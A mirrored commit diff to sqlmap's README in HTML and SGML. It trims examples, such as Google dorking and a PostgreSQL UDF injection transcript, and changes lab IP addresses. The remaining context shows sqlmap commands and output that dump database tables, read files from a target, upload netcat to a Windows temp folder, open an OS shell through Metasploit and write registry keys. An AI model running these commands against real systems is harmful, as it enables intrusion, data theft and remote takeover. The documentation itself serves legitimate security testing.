mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
More adjustments
This commit is contained in:
Bernardo Damele
parent
021fce5601
commit
50ba0fa955
108
doc/README.html
108
doc/README.html
|
|
@ -361,7 +361,7 @@ list of specific parameter(s) to test.
|
|||
requests (multi-threading)</B> to speed up the blind SQL injection
|
||||
techniques. Vice versa, it is also possible to specify the number of
|
||||
seconds to hold between each HTTP(S) request. Others optimization switches
|
||||
to speed up the exploitation are implemented as well.
|
||||
to speed up the exploitation are implemented too.
|
||||
</LI>
|
||||
<LI><B>HTTP <CODE>Cookie</CODE> header</B> string support, useful when the
|
||||
web application requires authentication based upon cookies and you have
|
||||
|
|
@ -1132,33 +1132,6 @@ first 100 results for the Google dork expression with <CODE>GET</CODE>
|
|||
parameters asking you if you want to test and inject on each possible
|
||||
affected URL.</P>
|
||||
|
||||
<P>Example of Google dorking with expression <CODE>site:yourdomain.com
|
||||
ext:php</CODE>:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
|
||||
|
||||
[hh:mm:38] [INFO] first request to Google to get the session cookie
|
||||
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
|
||||
testable hosts
|
||||
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
|
||||
[hh:mm:40] [INFO] url 1:
|
||||
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:43] [INFO] url 2:
|
||||
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:42] [INFO] url 3:
|
||||
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
|
||||
want to test this url? [y/N/q] y
|
||||
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
|
||||
[...]
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
|
||||
|
||||
<H3>Load options from a configuration INI file</H3>
|
||||
|
||||
<P>Switch: <CODE>-c</CODE></P>
|
||||
|
|
@ -1403,7 +1376,7 @@ connection timeouts. By default it retries up to <B>three times</B>.</P>
|
|||
<P>Rather than using all hosts parsed from provided logs with switch
|
||||
<CODE>-l</CODE>, you can specify valid Python regular expression to be used
|
||||
for filtering desired ones.</P>
|
||||
<P>Example usage:</P>
|
||||
<P>Example of valid syntax:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
|
|
@ -1983,22 +1956,23 @@ database name is not specified, the current database name is used.
|
|||
You can also provide the <CODE>-C</CODE> option to specify the table columns
|
||||
name like the one you provided to be enumerated.</P>
|
||||
|
||||
<P>Example against a MySQL target:</P>
|
||||
<P>Example against a SQLite target:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
|
||||
-T users -C name
|
||||
[...]
|
||||
Database: testdb
|
||||
Database: SQLite_masterdb
|
||||
Table: users
|
||||
[2 columns]
|
||||
+---------+---------------+
|
||||
| Column | Type |
|
||||
+---------+---------------+
|
||||
| name | varchar(500) |
|
||||
| surname | varchar(1000) |
|
||||
+---------+---------------+
|
||||
[3 columns]
|
||||
+---------+---------+
|
||||
| Column | Type |
|
||||
+---------+---------+
|
||||
| id | INTEGER |
|
||||
| name | TEXT |
|
||||
| surname | TEXT |
|
||||
+---------+---------+
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
|
|
@ -2028,7 +2002,7 @@ database name is used.</P>
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
[...]
|
||||
Database: Firebird_masterdb
|
||||
Table: USERS
|
||||
|
|
@ -2208,41 +2182,11 @@ sqlmap can also remove them from the database for you.</P>
|
|||
<P>These techniques are detailed in the white paper
|
||||
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A>.</P>
|
||||
|
||||
<P>Example against a PostgreSQL target:</P>
|
||||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
|
||||
|
||||
[...]
|
||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||
back-end DBMS: PostgreSQL
|
||||
|
||||
which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
|
||||
how many user-defined functions do you want to create from the shared library? 1
|
||||
what is the name of the UDF number 1? sys_eval
|
||||
how many input parameters takes UDF 'sys_eval'? (default: 1)
|
||||
what is the data-type of input parameter number 1? (default: text)
|
||||
what is the data-type of the return value? (default: text)
|
||||
do you want to call your injected user-defined functions now? [Y/n/q] y
|
||||
which UDF do you want to call?
|
||||
[1] sys_eval
|
||||
[q] Quit
|
||||
> 1
|
||||
what is the value of the parameter number 1 (data-type: text)? echo test
|
||||
do you want to retrieve the return value of the UDF? [Y/n]
|
||||
return value: 'test'
|
||||
|
||||
do you want to call this or another injected UDF? [Y/n] n
|
||||
do you want to remove UDF 'sys_eval'? [Y/n] y
|
||||
[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
|
||||
be deleted manually
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
</P>
|
||||
<P>Use switch <CODE>-</CODE><CODE>-udf-inject</CODE> and follow the instructions.</P>
|
||||
|
||||
<P>If you want, you can specify the shared library local file system path
|
||||
via command line using <CODE>-</CODE><CODE>-shared-lib</CODE> option.</P>
|
||||
via command line too by using <CODE>-</CODE><CODE>-shared-lib</CODE> option. Vice
|
||||
versa sqlmap will ask you for the path at runtime.</P>
|
||||
|
||||
<P>This feature is available only when the database management system is
|
||||
MySQL or PostgreSQL.</P>
|
||||
|
|
@ -2271,7 +2215,7 @@ file:</P>
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
--file-read "C:/example.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
|
@ -2282,14 +2226,14 @@ back-end DBMS: Microsoft SQL Server 2005
|
|||
|
||||
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
|
||||
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
|
||||
[...]
|
||||
|
||||
$ ls -l output/192.168.136.131/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
|
||||
$ ls -l output/192.168.136.129/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
|
||||
|
||||
$ file output/192.168.136.131/files/C__example.exe
|
||||
output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
$ file output/192.168.136.129/files/C__example.exe
|
||||
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
80386 32-bit
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
|
|
@ -2320,7 +2264,7 @@ $ file /tmp/nc.exe.packed
|
|||
$ ls -l /tmp/nc.exe.packed
|
||||
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
|
||||
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
|
@ -2483,7 +2427,7 @@ slide deck
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
--os-pwn -v 1 --msf-path /tmp/metasploit
|
||||
|
||||
[...]
|
||||
|
|
@ -2552,7 +2496,7 @@ provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value data, while with
|
|||
<P>
|
||||
<BLOCKQUOTE><CODE>
|
||||
<PRE>
|
||||
$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
||||
</PRE>
|
||||
</CODE></BLOCKQUOTE>
|
||||
|
|
|
|||
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
101
doc/README.sgml
101
doc/README.sgml
|
|
@ -1053,31 +1053,6 @@ first 100 results for the Google dork expression with <tt>GET</tt>
|
|||
parameters asking you if you want to test and inject on each possible
|
||||
affected URL.
|
||||
|
||||
<p>
|
||||
Example of Google dorking with expression <tt>site:yourdomain.com
|
||||
ext:php</tt>:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
|
||||
|
||||
[hh:mm:38] [INFO] first request to Google to get the session cookie
|
||||
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
|
||||
testable hosts
|
||||
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
|
||||
[hh:mm:40] [INFO] url 1:
|
||||
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:43] [INFO] url 2:
|
||||
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
|
||||
url? [y/N/q] n
|
||||
[hh:mm:42] [INFO] url 3:
|
||||
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
|
||||
want to test this url? [y/N/q] y
|
||||
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
|
||||
[...]
|
||||
</verb></tscreen>
|
||||
|
||||
|
||||
<sect2>Load options from a configuration INI file
|
||||
|
||||
<p>
|
||||
|
|
@ -1355,7 +1330,7 @@ Rather than using all hosts parsed from provided logs with switch
|
|||
<tt>-l</tt>, you can specify valid Python regular expression to be used
|
||||
for filtering desired ones.
|
||||
|
||||
Example usage:
|
||||
Example of valid syntax:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
|
||||
|
|
@ -2019,21 +1994,22 @@ You can also provide the <tt>-C</tt> option to specify the table columns
|
|||
name like the one you provided to be enumerated.
|
||||
|
||||
<p>
|
||||
Example against a MySQL target:
|
||||
Example against a SQLite target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
|
||||
-T users -C name
|
||||
[...]
|
||||
Database: testdb
|
||||
Database: SQLite_masterdb
|
||||
Table: users
|
||||
[2 columns]
|
||||
+---------+---------------+
|
||||
| Column | Type |
|
||||
+---------+---------------+
|
||||
| name | varchar(500) |
|
||||
| surname | varchar(1000) |
|
||||
+---------+---------------+
|
||||
[3 columns]
|
||||
+---------+---------+
|
||||
| Column | Type |
|
||||
+---------+---------+
|
||||
| id | INTEGER |
|
||||
| name | TEXT |
|
||||
| surname | TEXT |
|
||||
+---------+---------+
|
||||
</verb></tscreen>
|
||||
|
||||
<p>
|
||||
|
|
@ -2065,7 +2041,7 @@ database name is used.
|
|||
Example against a Firebird target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
|
||||
[...]
|
||||
Database: Firebird_masterdb
|
||||
Table: USERS
|
||||
|
|
@ -2267,39 +2243,12 @@ These techniques are detailed in the white paper
|
|||
name="Advanced SQL injection to operating system full control">.
|
||||
|
||||
<p>
|
||||
Example against a PostgreSQL target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
|
||||
|
||||
[...]
|
||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||
back-end DBMS: PostgreSQL
|
||||
|
||||
which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
|
||||
how many user-defined functions do you want to create from the shared library? 1
|
||||
what is the name of the UDF number 1? sys_eval
|
||||
how many input parameters takes UDF 'sys_eval'? (default: 1)
|
||||
what is the data-type of input parameter number 1? (default: text)
|
||||
what is the data-type of the return value? (default: text)
|
||||
do you want to call your injected user-defined functions now? [Y/n/q] y
|
||||
which UDF do you want to call?
|
||||
[1] sys_eval
|
||||
[q] Quit
|
||||
> 1
|
||||
what is the value of the parameter number 1 (data-type: text)? echo test
|
||||
do you want to retrieve the return value of the UDF? [Y/n]
|
||||
return value: 'test'
|
||||
|
||||
do you want to call this or another injected UDF? [Y/n] n
|
||||
do you want to remove UDF 'sys_eval'? [Y/n] y
|
||||
[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
|
||||
be deleted manually
|
||||
</verb></tscreen>
|
||||
Use switch <tt>-</tt><tt>-udf-inject</tt> and follow the instructions.
|
||||
|
||||
<p>
|
||||
If you want, you can specify the shared library local file system path
|
||||
via command line using <tt>-</tt><tt>-shared-lib</tt> option.
|
||||
via command line too by using <tt>-</tt><tt>-shared-lib</tt> option. Vice
|
||||
versa sqlmap will ask you for the path at runtime.
|
||||
|
||||
<p>
|
||||
This feature is available only when the database management system is
|
||||
|
|
@ -2332,7 +2281,7 @@ Example against a Microsoft SQL Server 2005 target to retrieve a binary
|
|||
file:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
|
||||
--file-read "C:/example.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
|
@ -2343,14 +2292,14 @@ back-end DBMS: Microsoft SQL Server 2005
|
|||
|
||||
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
|
||||
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
|
||||
C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
|
||||
[...]
|
||||
|
||||
$ ls -l output/192.168.136.131/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
|
||||
$ ls -l output/192.168.136.129/files/C__example.exe
|
||||
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
|
||||
|
||||
$ file output/192.168.136.131/files/C__example.exe
|
||||
output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
$ file output/192.168.136.129/files/C__example.exe
|
||||
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
|
||||
80386 32-bit
|
||||
</verb></tscreen>
|
||||
|
||||
|
|
@ -2383,7 +2332,7 @@ $ file /tmp/nc.exe.packed
|
|||
$ ls -l /tmp/nc.exe.packed
|
||||
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
|
||||
|
||||
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
|
||||
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
|
||||
|
||||
[...]
|
||||
|
|
@ -2554,7 +2503,7 @@ name="Expanding the control over the operating system from the database">.
|
|||
Example against a MySQL target:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
|
||||
--os-pwn -v 1 --msf-path /tmp/metasploit
|
||||
|
||||
[...]
|
||||
|
|
@ -2634,7 +2583,7 @@ provided key, with <tt>-</tt><tt>-reg-data</tt> value data, while with
|
|||
A sample command line for adding a registry key hive follows:
|
||||
|
||||
<tscreen><verb>
|
||||
$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
|
||||
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
||||
</verb></tscreen>
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user